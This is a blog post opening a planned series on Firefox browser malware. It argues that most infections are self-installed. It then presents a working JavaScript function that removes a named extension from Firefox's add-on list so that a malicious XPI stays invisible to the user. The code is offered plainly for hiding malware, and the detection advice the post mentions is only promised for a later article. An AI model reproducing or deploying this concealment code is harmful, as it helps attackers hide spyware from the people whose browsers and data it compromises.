I think this is a fun idea to play with, since it surely will happen mainstream sometime, might as well talk about it here.
Over the coming time I will be writing a couple of articles about Mozilla malware, on how to write it and how to detect it. In this first article I like to show you how to hide the actual installed malware in Firefox. Yes, that can be done pretty easily. Contrary what many people believe, most malware or spyware for that matter, is unknowingly installed by the user itself. It doesn't have anything to do with a browser vulnerability. In fact, I've never seen any malware that solely relied on a vulnerability. The reason is obvious. Vulnerabilities are hard to find and therefore exotic. And the lifetime of a vulnerability is limited and usually detected quickly and patched. If a PC is infected there is a high chance that you did it yourself. Given the computer illiteracy of internet surfers, it is the reason why surfers are being hacked in the first place. Stop whining because it is the truth. So, basically you can say that malware writing doesn't have anything todo with hacking. It's just convincing and attacking a surfer to install software that the surfers doesn't know about. Really simple.
Now Firefox allows some rich interaction with their extensions. In my opinion, they allow too much interaction. I could better say: it allows full interaction with the browser and the computer it runs on. While that might be an excellent idea, I think otherwise. What will happen if Firefox becomes an even more popular browser? Of course, attackers will focus more on Firefox. Personally, I always thought that a browser could make an excellent place for plugging malware. Since the web has become the next desktop, it's easy to imagine where this is going. Moreover, I think there isn't any better way of defeating AV-software than having browser malware. Because who scans the Firefox extension folder?
So the first thing that we can do is to hide the malware inside from surfers. This example hides the malware from the Firefox add-on list, which makes it invisible for enumeration:
function stealth(ext) {
var a = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
var b = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
var c = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
b.Init(c, a.GetResource("urn:mozilla:item:root"));
var e = b.GetElements();
while (e.hasMoreElements()) {
var extention = e.getNext();
if (c.GetTarget(extention, a.GetResource("http://www.mozilla.org/2004/em-rdf#name"), true).QueryInterface(Components.interfaces.nsIRDFLiteral).Value == ext) {
b.RemoveElement(extention, true);
}
}
}
stealth("Extension Name");That wasn't hard, was it?
When this function is added to a source file of a XPI installation package, the extension no longer shows up in the add-on or plugin list, and therefore we have successfully hidden our malware. Next time I'll talk about how to write a small extension that can be classified as browser malware, and how to stay safe or detect it.
